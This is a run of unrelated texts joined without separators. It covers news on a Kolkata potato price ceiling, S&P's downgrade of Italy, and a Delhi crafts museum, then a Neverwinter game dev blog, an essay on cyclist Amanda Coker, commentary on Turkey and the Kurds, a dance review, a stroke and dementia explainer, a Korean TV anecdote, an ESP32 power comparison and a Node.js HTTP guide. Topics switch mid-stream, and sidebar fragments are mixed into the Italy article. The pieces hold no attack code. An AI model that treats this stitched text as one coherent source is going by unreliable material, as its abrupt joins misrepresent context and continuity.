About a week ago, the government put a price ceiling of Rs 13 per kg on the popular Jyoti potato, and instructed the police to lodge FIRs against traders who defied the order. Three people have been arrested so far.
The order has driven the normally abundant Jyoti potato virtually out of currency. Traders say the economics just don't work out. "Those who make laws do not know the reality on the ground. The authorities have overlooked various problems that we businessmen face," a senior member of Park Circus Market Byabsayee Samity said, referring to poor storage infrastructure and resultant wastage that raises costs.
Vegetable seller Krishna Shaw at the Park Circus Market said, "The potatoes supplied by the government can't keep up with the demand. Also, a 50-kg bag which is sold to retailers for Rs 550 contains at least four kg of rotten potatoes, which takes the buying price per kg to nearly Rs 12. Then, many potatoes are small in size, for which customers are unwilling to pay Rs 13, raising our costs further. How are we expected to sell at Rs 13 then?"
Shaw said that margins were virtually non-existent, and unless the government relented, vendors were likely to simply stop selling potato.
Some vendors at North Kolkata's Manicktala market have been trying to find ways around the government's price ceiling. "We are selling at the stipulated price, but we are not giving any plastic carry bags.
Agriculture Marketing Minister Arup Ray admitted there was a scarcity, but said it was "man-made" and promised the problem would be solved in the next two days.
... contd.
Please read our terms of use before posting comments
Media playback is unsupported on your device Media caption Italians have mixed reactions to the rating cut
Italy has had the rating of its creditworthiness cut, the latest move in the European debt crisis.
Standard and Poor's cut its rating by one level to A from A+.
The agency cited Italy's weak growth, criticised Rome's response to the debt crisis so far and said political uncertainty could hamper it in future.
Markets shrugged off the decision, while Italian Prime Minister Silvio Berlusconi said the move was influenced by "political considerations".
Mr Berlusconi said the downgrade had been dictated more by stories in the media than by economic reality.
'Catching up'
Having started marginally lower, European stock markets then rose in morning trading.
Italy's MIB index rose 1.6% in the first three hours, while the German Dax was up 2.3% and London's FTSE 100 1.4%.
"S&P were only catching up with the markets," said Jane Foley, currency strategist at Rabobank.
"The markets have been penalising the Italian bond market for some months now for its fragile coalition [and] messy budget talks."
Your views Image caption "Now something must change" Vincenzo Trabacca, Milan "We all feel like a boat in a stormy sea, without a captain. "This is the feeling of all the Italian people that work hard every day. "I'm working and I feel confident business-wise. "I just would like to have a more stable political situation with some tough decisions taken soon, to make the situation better and to make sure that the next generation can have a better country. "I hope they understand that now something must change. You can contact us using the form below Italy downgrade: Your reaction
She added that fellow agency Moody's, who rates Italy three notches higher than S&P does, was now widely expected to follow suit with its own downgrade.
'Future uncertainty'
Italy recently passed an unpopular austerity budget, but S&P suggested this did not go far enough.
"We believe the reduced pace of Italy's economic activity to date will make the government's revised fiscal targets difficult to achieve," S&P said in a statement.
"Furthermore, what we view as the Italian government's tentative policy response to recent market pressures suggests continuing future political uncertainty about the means of addressing Italy's economic challenges."
S&P criticised the austerity budget's heavy reliance on tax rises - including a one-percentage-point increase in VAT - saying that taxes are already high in Italy, and the increases would weigh further on growth.
The 60bn euros (£52bn, $82bn) of austerity measures laid out in the budget are equivalent to 2.8% of Italian economic output.
Rome aims to balance its budget by 2013.
But the government is now expected to cut its growth forecast for this year from 1.1% to 0.7%, and this may force it to revise its borrowing forecast up.
Analysis People I have been talking to are unanimous - the country desperately needs some strong measures. And in the opinion of Standard & Poor's, it isn't getting them. It is going to be a rather bleak autumn and winter: cuts in social services, cuts in transport and rising prices, including a one percentage point rise in VAT last week. There is an atmosphere of widespread dismay that the government's so-called austerity programme doesn't seem likely to bite. Nor does it deal with two factors which colour the Italian economic situation: namely, the government's inability to deal decisively with widespread tax evasion at all levels, and the general lack of stimulus that it gives to the economy. This is a country that has been stagnating under the leadership of Prime Minister Berlusconi for years now and doesn't show any signs of improvement. What is a rating agency? Siemens 'in 500m-euro cash move'
The Italian finance minister, Giulio Tremonti, is meeting bankers and businessmen to discuss ways of boosting the country's growth rate.
Questions about the government's leadership played a major role in S&P's analysis:
"Even under pressure, Italian political institutions, incumbent monopolies, public sector workers, and... unions impede the government's ability to respond decisively to challenging economic conditions," the agency said in its report.
"It is unclear what can be done to break the deadlock between these political institutions and the government."
Contagion fears
Italy follows fellow eurozone countries Spain, the Republic of Ireland, Greece, Portugal and Cyprus in having its credit rating downgraded this year.
The surprise move by the ratings agency will fuel fears of contagion in the eurozone.
Italy has Europe's second-largest debt level and the cost of that debt has been rising in recent weeks as lenders to Italy have become nervous about its ability to repay loans.
Spain is also struggling to boost its flagging growth rate, and to bring its unemployment rate down from 21%.
"We are recovering more slowly than we would like," said the Spanish Finance Minister, Elena Salgado, on Tuesday.
She said her government would not lower its economic growth targets, although she conceded that if they were setting new forecasts today they might be different.
Media playback is unsupported on your device Media caption Robert Zoellick: ''The idea you are going to have the Chinese come with a bag of gold and buy everyone out of this problem, I wouldn't hold my breath''
Nonetheless, the costs of borrowing for Italy and Spain were virtually unchanged on Tuesday morning following S&P's announcement.
Italy's bond yield, which indicates its cost of borrowing, hovering around 5.6% in early trading.
The euro rose marginally against the dollar to $1.37.
The latest news comes after concern over Greece and whether or not it will default on its loans hit markets hard on Monday.
The Greek government is in talks with the International Monetary Fund and the European Union about getting more bailout money released.
A second conference call to finalises Greece's latest austerity measures is set to take place later on Tuesday.
Earlier this month, S&P cut the credit rating of the US from AAA to AA+ for the first time in its history.
To dismantle a national crafts museum, and put in its place an academy, seems a travesty — Ruchira Ghose, outgoing chairperson of Crafts Museum
When the government announced in the Union Budget that it was setting up of a Hastakala Academy in Delhi “for the preservation, revival and documentation of the handloom/handicraft sector,” little did people know that it would be displacing something that has been part of the city's ethos for more than half a century.
Advertising
The Hastakala Academy is going to come up in the place of National Handicrafts and Handlooms Museum (NHHM), commonly known as National Crafts Museum, on Bhairon Marg. In fact, once the academy is operational, NHHM is going to be “integrated” into it and will be run as a subsidiary.
The ministry of textiles, which runs the museum and will run the academy as well, had been quietly working towards it much before the formal announcement was made. It was in December last year that personnel from the ministry visited the museum and conveyed to the administration that they were planning to set up a handicrafts academy there instead.
Ruchira Ghose, chairperson of NHHM, whose term officially ends on Sunday said, “When officials from the department of handicrafts visited here a few months ago and said they were planning to set up the Hastakala Academy, I explained there was no space on this site for the kind of plans they had. But they seemed to have made up their minds because they started measuring the spaces in the galleries to convert into “classrooms”.
The museum was set up in 1958 by the late freedom fighter and conservationist Kamaladevi Chattopadhyay, with an aim to preserve traditional art and crafts and make them commercially viable. It took over two decades for NHHM to evolve into its present form. Today, the five-acre premises hold 35,000 distinctive pieces reflecting Indian craft traditions through painting, embroidery, textiles, clay, stone and wood, all housed in the building designed by architect Charles Correa in the 1970s.
For 18 years, the museum was run by culture historian Jyotindra Jain, till 2001. After his tenure ended, it remained headless till 2010, when Ghose took over. Friday was Ghose's last day in office. In between sorting through files and papers, she spoke with a little sadness about the unfinished tasks that remain.
“We were sanctioned a generous budget for the rejuvenation project in 2012. We have been able to utilise slightly less than half the budget till now, as the work has now been stopped. Whatever the plans are for this institution, the repairs to the building are essential if it is to be used at all,” Ghose said.
Officials in the ministry of textiles said the academy is on track, and right now, the project is in the stage of getting funds approved from the government. “There is a plan in place but we can't share any details as of now. The academy will come up in its stipulated time frame,” said an official.
Advertising
Ghose said there seems to be a hurry to push the project. Some weeks ago, the museum was shifted overnight from the department of handlooms to the department of handicrafts, which is apparently going to spearhead the Hastakala Academy. What may concern art lovers and collectors in the city is what happens to the collections inside the museum. The museum represents more than a hundred years of the craft history of India. “To dismantle a national crafts museum, and put in its place an academy, seems a travesty. There has been no concept note circulated so no one really knows what is going to happen. Perhaps things will coast along for a while and then start to unravel,” said Ghose.
Dev Blog Written By: Christopher Meyer, Systems Designer
Greetings Adventurers!
Today we wanted to talk about the design of the Scourge Warlock and how he came to be on the continent of Faerûn. Scourge Warlocks are powerful spellcasters who have made bargains with Dark Patrons to fuel their infernal powers. They specialize in decimating and destroying foes with eldritch power. In the world of Neverwinter this translates into a powerful damage dealer who focuses on particular foes and uses his Curses to deal decimating blows to the target. Warlocks of Neverwinter are members of Infernal Pacts, channeling the power of devils and the Nine Hells into their foes, leaving scorched earth in their wake.
Given this we wanted to take time to give Scourge Warlocks several unique play styles and allow them to fill a variety of roles on a team, while still focusing on dealing damage. They can follow one of three possible feat trees: Fury, Damnation, and Temptation.
Fury - A Fury Scourge Warlock destroys his foes with fire and death, cursing his foes and then decimating them with his most powerful spells, leaving them a smoking husk.
Damnation – A Damnation Scourge Warlock controls a Soul Puppet to empower himself and destroy his foes, eventually making this puppet a permanent part of his arsenal. While his Soul Puppet is active he is a much more potent combatant who can destroy enemies at various distances.
Temptation – A Temptation Scourge Warlock binds the souls of his enemies and his allies to steal the very life force from his foes to heal his allies. He also commands several auras that bolster nearby allies or weaken nearby enemies.
With these options, Scourge Warlocks can fill roles as primary damage dealers and support casters who empower their allies. Additionally they can also command a Soul Puppet granted to them by their Patron to fight alongside them and augment their own combat abilities.
Scourge Warlocks also have access to the Hellbringer paragon path, which summons fiery horrors and opening Gates to the Nine Hells to destroy and consume all who stand before them.
That's a lot of information, and we wish we could into even more detail, but we'll save that for another time. We can't wait for everyone to play the newest class once Module 4 releases on August 14! In the mean-time, check out our previous Module 4 coverage and be sure to check back with us often for more announcements and previews.
Click here to register for Neverwinter, the Dungeons & Dragons action MMORPG. The best part about Neverwinter: it's free to play! Get a head start in-game by purchasing Neverwinter item packs which include unique companions, mounts, boosts, and exclusive benefits!
Want more game details, screens, and videos? Like Neverwinter on Facebook for more fan-exclusive content and follow us on Twitter – tweet us your questions! And, subscribe to our YouTube channel for the latest Neverwinter videos.
For the past 365 days, Amanda Coker, a 24-year-old woman from Zephyrhills, Florida, has been out on her bike, each day, every day, often cycling for over 12 hours at a time. She has ridden at a consistent pace, not too fast, but quicker than many amateur cyclists could sustain for half an hour. Sometimes she's been alone, but often she was with other local cyclists who were trying to ride 100 miles with her — to join the ‘100 Mile Club' on her social media networks. She has also been riding, for the most part, in circles. Coker, you see, has been attempting to break the Ultramarathon Cycling Association's women's ‘Highest Annual Mileage Record', or ‘HAM'R' for short. For the past 365 days, she has been attempting to cycle further than any woman previously has.
Or, that was her initial stated goal. The thing is, not only did Coker breeze past the previous women's record — which, largely because the UMCA has only recently started keeping records, has stood since 1938 — but she also flew past the overall record, set only last year by Kurt Searvogel of Arkansas (notably, a man). Searvogel had ridden an astonishing 76,076 miles in his year-long effort; Coker beat him with a full forty days remaining. (She passed the women's record on day 130 of her time trial.) Her average for the past year has been a little above 231 miles per day — for context, the longest stage of this year's Tour de France will be just under 137 miles, and the longest race on the pro calendar, Milan-Sanremo, is about 181 miles. In the most recent months, Coker also embarked on three overlapping attempts at the UMCA's second most prestigious title, the ‘Highest Monthly Mileage Record'. Her first complete month, totalling 8,009 miles exactly, beat the previous record, held by Steven Abraham of Great Britain, by almost 900 miles. Her second and third efforts each surpassed the one before. It became clear that, in the final months, Coker was only getting stronger. Now, at the end of her complete year, with 86,573 miles under her belt already, she's still going — she now has her sights set on the record for fastest completion of 100,000 miles. She is likely to manage it with ease.
Superhuman displays of ability aside, one of the most astonishing elements of Coker's story is not the mileage itself, but the fact that she makes those miles up on the same seven-mile loop of wide, level trails around Flatwoods Park, Florida. With only small deviances from that one path, usually including the short ride to the loop from the car park, this has meant that Coker has ridden in circles for around thirty times per day for the past year. Her uploaded data on Strava — the popular running and cycling app and website that tracks users' activities and stimulates a sense of athletic competition — appear to the untrained eye almost identical. Even to the trained eye her rides look pretty darn similar. (Coker has been at the top of Strava's digital leaderboard for distance each month for the past year; even in her slowest months no man nor woman could best her.) It is staggering to think that someone who has spent her past year riding 86,000 miles hasn't seen much more than those seven miles of tarmac.
There are good reasons for this decision. The park offers a level stretch of path, without hills and excessive wind, and riding in a loop has meant that Coker is never too far away from water or nutritional support (Strava's estimates of calories burnt by Coker are always well above 8,000 per day). And riding in loops means no stopping for traffic lights or to check a map. But there's a further reason why Coker doesn't ride on the open roads. In her late teens, Coker had been a promising young road racer, with a scholarship to ride on a college team. Disaster took this away from her. She and her father, whilst out riding, were hit by a car coming from behind; both suffered serious injuries, including in Coker's case brain and spine injuries. Her career as a professional cyclist was never to be, but she was determined to return to the bike, and, riding in Flatwoods in 2015, she came across none other than Kurt Searvogel — whose world record she has now recently claimed. Searvogel was in the midst of his own record attempt then, and Coker had the opportunity to ride with him during his long days in the park. Flatwoods was the natural choice when it came to starting her own campaign.
In part because she has ridden herself out of misfortune, Coker's rides get a thousand of thumbs up on Strava, little affirmations known collectively as ‘kudos'. However, not everyone has been happy with her record, and browsing through her social media posts and comments on articles about her — especially in the early months of her efforts — you would find (usually male) voices of objection. In part this has to do with the choice to ride in a loop, rather than covering distance or riding ‘out and back'. The loop, according to Strava (which can't always be completely trusted on matters of altitude), offers only 2m of height variance; Coker, as commentators have observed, often racks up fewer vertical metres in 230 miles than could be done on a climb. Coker also receives flak for her occasional use of a recumbent bike, one that allows for a more comfortable and sustainable ‘lying down' position (she alternates between a road bike, a recumbent, and a triathlon or ‘tri' bike). Her critics, whose voices have slowly been drowned out as the popularity of her rides has grown, generally make one kind of assertion: that she's not being true to the spirit of cycling. A representative example from Strava reads: ‘You have such a flat course, you may as well do it on an exercise bike indoors. congratulations on your distance, but it is not real cycling'. Another: ‘Might as well just do it on a turbo bike' (a ‘turbo' is a device which fixes a bike in one place, for training purposes). A third calls her efforts ‘a long spinning class or something'; if the other comments implied sexism, this one surely makes it explicit. Cycling, it should be noted, as a sport, is plagued by such questions of authenticity. This might be in large part because of the history of doping in cycling, which reaches down — amazingly — even as far as the amateur level. But only a very few posts have implied that Coker might be cheating, and they usually relate to crackpot theories about ‘motor-doping' — the use of a hidden motor in a road bike — and not to performance-enhancing drugs.
Then there are the dual questions of obsession and of boredom. What must go through her mind? A commenter writes, not entirely kindly: ‘I don't know if I'll be more impressed by your mileage or your ability to mentally ride the same loop over, and over and over and over…'. Coker herself, on her website, states that ‘the whole reason I'm doing it, it's cos it's fun. I get to ride my bike every day! For a year!' But it's hard to imagine that the same dull round, day in, day out, really is all that fun. Her labours beg strange comparison to the drudgery of the world of work, rather than those of leisure or pleasure — Coker has been spending on average over 90 hours a week on her bike. It doesn't help her cause that the previous monthly distance record holder, Steven Abraham, has now set off in pursuit of Coker's year goal, whilst riding greatly varying routes all around the east of England (more like ‘real' cycling). It also offers the regrettable image of an older male cyclist bearing down on an upstart young woman's new record. In reality, both Searvogel and Abraham are outspoken in their support for Coker's phenomenal riding, but some of the ‘kudos' Abraham is now getting can occasionally feel like an attack on Coker's unpopular methods, especially given that cycling is a male-dominated sport; consider this comment: ‘Lets [sic] hope Steve Abraham takes it back and makes it an “open road” challenge again, and on a “bike” bike'. Commenters seem repelled by the sheer scale and repetitiousness of what she has done, with the question being asked, broadly speaking, ‘why?' Why bother? What is there to gain? What's the point?
These are good questions, of course, provided that they are not limited to Coker's rides. It seems pretty clear that Coker is motivated by the past thought that she might never have ridden again; she has plenty to prove to herself, and she's proven something to the cycling world in the process. But what about the rest of us? Look at Strava, a platform which encourages people to self-identify as ‘athletes'. We could equally ask what anyone on there hopes to gain. They might answer, ‘we are exercising', and, therefore, the end-goal is health. But that's not really what you see on Strava, or any other social media-enabled activity tracker. You see people trying to prove their health and vitality, alright, but health isn't the goal. Like with other social media, people are out to show the best side of themselves, to show off. A more honest answer to the question ‘why?' might be ‘to be faster', ‘to be stronger', ‘to go further', ‘to be better'. Those are, after all, the metrics by which all Strava users measure and compare performances, and it is because speed and distance are recognised as goals in themselves that Coker's efforts are mostly readily understood. But, even in light of these answers, we might quite reasonably persist: why?
‘When life has succeeded by dint of daily effort in conquering the enemies around it — natural forces, wild beasts, hunger, thirst, sickness — sometimes it is lucky enough to have abundant strength left over. This strength it seeks to squander into sport'. The quote is from Nikos Kazantzakis's 1961 novel Report to Greco, hardly a conventional source for sporting wisdom, but wise all the same. For Kazantzakis, sport is a high point of culture, and a proof that we are indeed civilized beings, because sport, like art, exists in the moment ‘that life satisfies its primary needs and begins to enjoy a little leisure'. To that extent, Amanda Coker's story tells us something about ourselves in the Western world. Hers is a story of excess, to be sure, but it is only one hyperbolic example of what we are all doing, what we're all caught up in. Whether we eat to the point of obesity or chisel ourselves into hardened muscle, our bodies are registers of an abundance — a superabundance even. For the first time in history, enough of us have the requisite leisure time, food, and disposable income to make it the case that an excessive gaining — and, often, burning — of vast volumes of calories is perceived to be quite normal. This is hardly unproblematic given that much of the world goes without basic nutrition, but it is true to say that athletic achievement acts as the record of a vast surplus. And distance and time goals, be they ‘Couch to 5k', the 26.2 miles that make up a marathon, or the HAM'R effort undertaken by Coker, offer us excessive indicators of what we are becoming as a society.
I have great sympathy for Amanda Coker's efforts, although the knowledge that I couldn't do what she has done is not incompatible, for me, with the knowledge that I wouldn't want to. The particular form of obsession that grips ‘ultramarathon' cyclists like Coker, Searvogel, and Abraham is certainly extreme — far beyond my wishes, desires, or capabilities — but it's not completely alien to any sportsperson at any level. That Coker was met by some detractors was to be expected, especially in the age of the internet and anonymity; that most of her detractors seem to be men, and that she seems to have more critics than had Searvogel, was also sadly inevitable. But Coker, a woman, has won: she is the official record-holder of the annual mileage category, recognised by both the UMCA and now Guinness World Records. In cycling, a sport where women racers no longer even have a comparable world tour to parallel the Tour de France, where women's prize money is a pittance compared to the men's, and in which ‘podium girls' still regularly flank winners of both sexes, one woman has come along and annihilated all previous month and year distance records. The record categories will now need rethinking, as, for the first time, the ‘regular' world record belongs to a woman; the men's record, for once, lags behind. For those reasons alone we should be pleased for Coker, and for her overwhelming and dizzying achievement. As they say in cycling, chapeau.
A year into the coalition campaign to defeat Islamic State in Iraq and the Levant (Isil), the arrival of six American F-16 fighters at the Incirlik airbase in southern Turkey should be a cause for celebration.
This time last year, when the US first began bombing Isil positions in Iraq and Syria, its biggest handicap was being denied access to Turkish military bases. Despite Turkey's Nato membership, Recep Tayyip Erdoğan, the country's leader, was reluctant to provide support for the US-led coalition effort against Isil.
President Erdoğan's priority was the fall of Syrian President Bashar al-Assad, a long-standing rival of the Turkish leader. From his perspective, Isil looked like the force most likely to defeat Assad and Turkey therefore saw no reason to back the American effort against it.
Then came last month's Isil-inspired suicide bomb attack on the southern Turkish border town of Suruc , which killed 32 youth activists. Mr Erdoğan had a change of heart.
Within days of the atrocity, Turkish warplanes were bombing Isil targets in Syria, while Ankara finally gave permission for American jets to fly combat missions from Turkish bases.
So the arrival of the first batch of US warplanes at Incirlik at the weekend should have heralded a turning point in the war against Isil, and at a time when there is mounting concern that the coalition effort against the militants is failing to make headway. Recent intelligence reports, for example, suggest Isil now holds more territory in Syria and Iraq than it did when Washington began its bombing offensive last August.
But any hopes that Turkey's belated decision to support the coalition air campaign might prove to be a game-changer have been seriously undermined by the Turkish president's decision to reignite hostilities with the Kurds.
The Turks and Kurds have already fought one bitter conflict that claimed the lives of around 40,000 people between 1984 and 2013. Now there is every prospect of Turkey being plunged into another civil war, with all the negative implications that is likely to have for coalition efforts against Isil. On Tuesday Turkish warplanes bombed 17 Kurdish targets in the south east of the country after the Kurdish PKK militant group claimed it was responsible for Monday's bombing of an Istanbul police station in which four people died.
Photo: Reuters
And while Tuesday's military activity was kept within Turkey's borders, Turkish warplanes have also been bombing PKK targets in Syria, thereby adding a new dimension to a conflict that is already being waged on many fronts.
Before Turkey's intervention there were two conflicts taking place in Syria: one against the Assad regime, and the other against Isil. Turkey's assault on the Kurds is a third, yet another complication in a theatre of war that was already bewilderingly complex.
So far as the West and its allies are concerned, the Turks' revival of hostilities against the Kurds is unhelpful for several reasons. The PKK, the most militant of the Kurdish groups, is rightly condemned as a terrorist organisation by Washington and other Western powers. But it is also closely allied with Syrian-based Kurdish groups which have proved to be the most effective fighters on the ground against Isil. Indeed, many of the bombing missions those newly-arrived American F-16s will be carrying out are expected to be in support of Kurdish operations on the ground in Syria against Isil. No wonder PKK leaders have accused Ankara of attacking Kurdish positions simply in order to protect their erstwhile allies in Isil.
The larger concern, though, about Turkey's military re-engagement with the Kurds is that it distracts attention away from the main coalition effort in Syria and Iraq: namely, defeating Isil.
While Western policymakers fret about how to contain deepening tensions between Turkey and the Kurds, Isil continues to grow in strength. This week's announcement by the Nusra Front, al-Qaeda's affiliate in Syria conflict, that it is withdrawing from its positions along the border with Syria, will help to boost Isil's war-fighting capabilies. Ideological differences between Al-Nusra and Isil have seen the rival groups engaging in bitter clashes in northern Syria.
The Nusra Front's decision to withdraw, taken because it does not want to be seen as fighting under the cover of American and Turkish air strikes, means that Isil no longer needs to worry about defending its borders against Nusra fighters. Instead it can intensify its efforts to defeat the Assad regime and acquire more territory in both Syria and Iraq.
Isil can do this, moreover, at a time when the Assad regime finds itself very much on the ropes, having lost hundreds of its own fighters, as well as many Iranian-backed Hizbollah fighters, in recent weeks.
Any development that strengthens Isil's position is something the West should view with alarm, which is why every effort should be made to curb the escalating crisis between Turkey and the Kurds.
As a choreographer, Sidi Larbi Cherkaoui has always been drawn to the big idea, taking abstract theories about culture, religion and evolution as the starting points for his work. Sometimes his creations flounder under the weight of their intellectual exposition. But in Fractus V, which is structured around the writings of Noam Chomsky, the ideas form a fluid medium in which the buoyant dance can play.
It is a deliberately masculine work; all nine of its dancers and musicians are men. But it also embraces an exhilarating diversity of styles, and as so often with Cherkaoui's work, it delivers its most emotional charge at the point where those styles meet. In Fractus V, that point comes at the beginning and end of the work, where all the cast join together in a soaring polyphonic song. It's a marvellous braid of sound, fusing Middle Eastern influences to a wildly ecstatic pitch, and as a fierce expression of unity it resonates across the work, providing a rich context for the fragments of Chomsky text that are narrated throughout.
Chomsky's thesis is that we live in a world where language and information are manipulated by governments to become tools of political control; where freedom of thought has to be preserved by collective resistance. And for Cherkaoui, this principle of collaboration is the choreography's driving force. He expresses it through images of marvellous ingenuity, slotting his dancers together into multi-limbed patterns and constellations, but also through a constant swapping between forms.
Facebook Twitter Pinterest Drawn to the big idea … Fractus V. Photograph: Tristram Kenton for the Guardian
Cherkaoui himself performs a duet with the flamenco dancer Fabien Thomé Duten, his soft fluid body steeled with witty swagger and strut. Elsewhere, the dance morphs into circusy backflips and breakdance spins, while the musicians provide their own brilliant fusion of oriental jazzy and percussive sound.
There's also a dark underbelly of violence to this community, as the men descend into precision-choreographed gun battles and fights. But as with the best of Charkaoui's work, Fractus V is a thrillingly expansive watch, large with possibilities and potent with ideas.
•At Sadler's Wells, London, until 28 October. Box office: 020-7863 8000.
What Facts Should I Know about Stroke-Related Dementia?
What is the medical definition of a stroke?
Stroke (“brain attack”) is a disease of the blood vessels in and around the brain. It occurs when part of the brain does not receive enough blood to function normally and the cells die (infarction), or when a blood vessel ruptures (hemorrhagic stroke). Infarction is more common than hemorrhage and has a number of causes; for example, a vessel (artery) supplying blood to the brain can become blocked by a fatty deposit (plaque), which can form clots and send pieces into vessels further in the brain, or these arteries become thickened or hardened, narrowing the space where the blood flows (atherosclerosis). In addition, clots can arise in the heart and travel to the brain. Permanent damage to brain cells can result.
Does a stroke lead to dementia?
The symptoms of stroke vary, depending on which part of the brain is affected.
Common symptoms of stroke are sudden paralysis or loss of sensation in part of the body (especially on one side), partial loss of vision or double vision, or loss of balance. Loss of bladder and bowel control can also occur.
Other symptoms include decline in “cognitive” mental functions such as memory, speech and language, thinking, organization, reasoning, or judgment.
Changes in behavior and personality may occur.
If these symptoms are severe enough to interfere with everyday activities, they are called dementia.
Cognitive decline related to stroke is usually called vascular dementia or vascular cognitive impairment to distinguish it from other types of dementia. In the United States, it is the second most common form of dementia after Alzheimer's Disease. Vascular dementia is preventable, but only if the underlying vascular disease is recognized and treated early.
People who have had a stroke have a greater risk of dementia than people who have not had a stroke. About 1 in 10 people who have a stroke develop signs of dementia within 1 year.
Vascular dementia is most common in older people, who are more likely than younger people to have vascular diseases. It is more common in men than in women.
By Lee Kyungmin
A woman surnamed Huh shared her story of having a stressful life because her dad can't be bothered to wear any clothes at home, KBS 2TV "Hello" reported Monday.
Huh said that her dad always takes his pants off, even when she has her friends over. At her uncle's funeral, he slept under the table with only his underpants on.
She said he walks in front of her naked, and sits on a sofa naked, too. Her dad was casual in answering the questions the whole time saying, "It just feels natural. It's more comfortable, too. When I'm home, I want to stay naked."
"I want to live alone in a remote island maintaining the natural state of men, being naked that is." He added that he doesn't get all the fuss about being naked.
"My daughter steps out of the shower in her undergarments, too, but I don't look at her. What's the big deal? Everyone does that!" And the program's closing scene was the footage of the audience's look _ flabbergasted _ on their faces.
[G6EJD] wanted to design a low power datalogger and decided to look at the power consumption of an ESP32 versus an ESP8266. You can see the video results below.
Of course, anytime someone does a power test, you have to wonder if there were any tricks or changes that would have made a big difference. However, the relative data is interesting (even though you could posit situations where even those results would be misleading). You should watch the videos, but the bottom line was a 3000 mAh battery provided 315 days of run time for the ESP8266 and 213 days with the ESP32.
The fact that the hardware and software only differ in the central processing unit means the results should be pretty comparable. [G6EJD] accounts for the current draws throughout the circuit. The number of days were computed with math, so they don't reflect actual use. It also depends on how many samples you take per unit time. The goal was to get operation on batteries to last a year, and that was possible if you were willing to reduce the sample rate.
While we generally like the ESP32, [G6EJD] makes the point that if battery life is important to you, you might want to stick to the ESP8266, or look for something else. Naturally, if you are trying to maximize battery life, you are going to have to do a lot of sleeping.
Anatomy of an HTTP Transaction
The purpose of this guide is to impart a solid understanding of the process of Node.js HTTP handling. We'll assume that you know, in a general sense, how HTTP requests work, regardless of language or programming environment. We'll also assume a bit of familiarity with Node.js EventEmitters and Streams . If you're not quite familiar with them, it's worth taking a quick read through the API docs for each of those.
Create the Server
Any node web server application will at some point have to create a web server object. This is done by using createServer .
const http = require ( 'http' ) ; const server = http . createServer ( ( request , response ) => { } ) ;
The function that's passed in to createServer is called once for every HTTP request that's made against that server, so it's called the request handler. In fact, the Server object returned by createServer is an EventEmitter , and what we have here is just shorthand for creating a server object and then adding the listener later.
const server = http . createServer ( ) ; server . on ( 'request' , ( request , response ) => { } ) ;
When an HTTP request hits the server, node calls the request handler function with a few handy objects for dealing with the transaction, request and response . We'll get to those shortly.
In order to actually serve requests, the listen method needs to be called on the server object. In most cases, all you'll need to pass to listen is the port number you want the server to listen on. There are some other options too, so consult the API reference.
Method, URL and Headers
When handling a request, the first thing you'll probably want to do is look at the method and URL, so that appropriate actions can be taken. Node makes this relatively painless by putting handy properties onto the request object.
const { method , url } = request ;
Note: The request object is an instance of IncomingMessage .
The method here will always be a normal HTTP method/verb. The url is the full URL without the server, protocol or port. For a typical URL, this means everything after and including the third forward slash.
Headers are also not far away. They're in their own object on request called headers .
const { headers } = request ; const userAgent = headers [ 'user-agent' ] ;
It's important to note here that all headers are represented in lower-case only, regardless of how the client actually sent them. This simplifies the task of parsing headers for whatever purpose.
If some headers are repeated, then their values are overwritten or joined together as comma-separated strings, depending on the header. In some cases, this can be problematic, so rawHeaders is also available.
Request Body
When receiving a POST or PUT request, the request body might be important to your application. Getting at the body data is a little more involved than accessing request headers. The request object that's passed in to a handler implements the ReadableStream interface. This stream can be listened to or piped elsewhere just like any other stream. We can grab the data right out of the stream by listening to the stream's 'data' and 'end' events.
The chunk emitted in each 'data' event is a Buffer . If you know it's going to be string data, the best thing to do is collect the data in an array, then at the 'end' , concatenate and stringify it.
let body = [ ] ; request . on ( 'data' , ( chunk ) => { body . push ( chunk ) ; } ) . on ( 'end' , ( ) => { body = Buffer . concat ( body ) . toString ( ) ; } ) ;
Note: This may seem a tad tedious, and in many cases, it is. Luckily, there are modules like concat-stream and body on npm which can help hide away some of this logic. It's important to have a good understanding of what's going on before going down that road, and that's why you're here!
A Quick Thing About Errors
Since the request object is a ReadableStream , it's also an EventEmitter and behaves like one when an error happens.
An error in the request stream presents itself by emitting an 'error' event on the stream. If you don't have a listener for that event, the error will be thrown, which could crash your Node.js program. You should therefore add an 'error' listener on your request streams, even if you just log it and continue on your way. (Though it's probably best to send some kind of HTTP error response. More on that later.)
request . on ( 'error' , ( err ) => { console . error ( err . stack ) ; } ) ;
There are other ways of handling these errors such as other abstractions and tools, but always be aware that errors can and do happen, and you're going to have to deal with them.
What We've Got so Far
At this point, we've covered creating a server, and grabbing the method, URL, headers and body out of requests. When we put that all together, it might look something like this:
const http = require ( 'http' ) ; http . createServer ( ( request , response ) => { const { headers , method , url } = request ; let body = [ ] ; request . on ( 'error' , ( err ) => { console . error ( err ) ; } ) . on ( 'data' , ( chunk ) => { body . push ( chunk ) ; } ) . on ( 'end' , ( ) => { body = Buffer . concat ( body ) . toString ( ) ; } ) ; } ) . listen ( 8080 ) ;
If we run this example, we'll be able to receive requests, but not respond to them. In fact, if you hit this example in a web browser, your request would time out, as nothing is being sent back to the client.
So far we haven't touched on the response object at all, which is an instance of ServerResponse , which is a WritableStream . It contains many useful methods for sending data back to the client. We'll cover that next.
HTTP Status Code
If you don't bother setting it, the HTTP status code on a response will always be 200. Of course, not every HTTP response warrants this, and at some point you'll definitely want to send a different status code. To do that, you can set the statusCode property.
response . statusCode = 404 ;
There are some other shortcuts to this, as we'll see soon.
Setting Response Headers
Headers are set through a convenient method called setHeader .
response . setHeader ( 'Content-Type' , 'application/json' ) ; response . setHeader ( 'X-Powered-By' , 'bacon' ) ;
When setting the headers on a response, the case is insensitive on their names. If you set a header repeatedly, the last value you set is the value that gets sent.
Explicitly Sending Header Data
The methods of setting the headers and status code that we've already discussed assume that you're using "implicit headers". This means you're counting on node to send the headers for you at the correct time before you start sending body data.
If you want, you can explicitly write the headers to the response stream. To do this, there's a method called writeHead , which writes the status code and the headers to the stream.
response . writeHead ( 200 , { 'Content-Type' : 'application/json' , 'X-Powered-By' : 'bacon' } ) ;
Once you've set the headers (either implicitly or explicitly), you're ready to start sending response data.
Sending Response Body
Since the response object is a WritableStream , writing a response body out to the client is just a matter of using the usual stream methods.
response . write ( '<html>' ) ; response . write ( '<body>' ) ; response . write ( '<h1>Hello, World!</h1>' ) ; response . write ( '</body>' ) ; response . write ( '</html>' ) ; response . end ( ) ;
The end function on streams can also take in some optional data to send as the last bit of data on the stream, so we can simplify the example above as follows.
response . end ( '<html><body><h1>Hello, World!</h1></body></html>' ) ;
